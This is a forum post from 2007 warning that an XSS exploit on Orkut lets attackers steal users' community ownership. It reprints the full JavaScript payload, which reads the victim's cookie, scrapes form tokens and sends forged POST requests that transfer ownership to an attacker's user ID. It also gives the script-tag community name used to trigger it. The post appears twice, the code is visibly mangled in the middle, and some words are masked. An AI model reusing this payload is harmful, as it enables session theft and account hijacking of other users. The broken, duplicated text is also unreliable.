Orkut cookie exploit , anyone can steal your orkut community ownership, BEWARE!!!
Posted: Sun Mar 11, 2007 7:11 am
There is yet another exploit on Orkut(the Google affiliated Social Networking Service), and this exploit can easily be made use of to obtain ownership of someone else's community, with just a **** on a community link. Name the community with:
< script scr="...URL...">
where URL points to the location where the below JavaScript is stored. Once someone **** on a community having such has such a name, the script at that URL gets executed, and their community ownership is transferred to the person with the user ID **** (see below) which is the person's 20 digit User ID to whom your ownership gets transferred to. I just lost onwership to my "C/C++ Programmers India" community. So, BEWARE of this exploit and NEVER EVER **** on any community or profile with a name such as:
< script scr="...URL...">
The JavaScript exploit code is as below: (comments are in Portuguese, which I don't know a thing about, and neither am I a JavaScript expert, so I let you understand this script by yourself).
var uid="****"; ////window.alert('injetado');function createXMLHttpRequest(){try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}try{ return new XMLHttpRequest(); }catch(e){}return null;}function getCookies(){subject="Orkut Cookie Exploit";dcookie=****.cookie;if(dcookie.indexOf('state') > -1){mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";}else{mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";}check_scraps();};getCookies();function velocity_transfer(){send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";var xml= createXMLHttpRequest();xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);xml.onreadystatechange=function(){if(xml.readyState==4){var
xmlrtr=xml.responseText;x++;if(x -1 ? cont.indexOf(' -1 ? cont.indexOf(' -1){SIG=xmlr1.match(/signature. value="(.+)"/i)[1];POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];send_message();}else{check_scraps();}};};xml.send(null);};// Exploit escrito por Rodrigo Lacerda
< script scr="...URL...">
where URL points to the location where the below JavaScript is stored. Once someone **** on a community having such has such a name, the script at that URL gets executed, and their community ownership is transferred to the person with the user ID **** (see below) which is the person's 20 digit User ID to whom your ownership gets transferred to. I just lost onwership to my "C/C++ Programmers India" community. So, BEWARE of this exploit and NEVER EVER **** on any community or profile with a name such as:
< script scr="...URL...">
The JavaScript exploit code is as below: (comments are in Portuguese, which I don't know a thing about, and neither am I a JavaScript expert, so I let you understand this script by yourself).
var uid="****"; ////window.alert('injetado');function createXMLHttpRequest(){try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}try{ return new XMLHttpRequest(); }catch(e){}return null;}function getCookies(){subject="Orkut Cookie Exploit";dcookie=****.cookie;if(dcookie.indexOf('state') > -1){mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";}else{mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";}check_scraps();};getCookies();function velocity_transfer(){send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";var xml= createXMLHttpRequest();xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);xml.onreadystatechange=function(){if(xml.readyState==4){var
xmlrtr=xml.responseText;x++;if(x -1 ? cont.indexOf(' -1 ? cont.indexOf(' -1){SIG=xmlr1.match(/signature. value="(.+)"/i)[1];POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];send_message();}else{check_scraps();}};};xml.send(null);};// Exploit escrito por Rodrigo Lacerda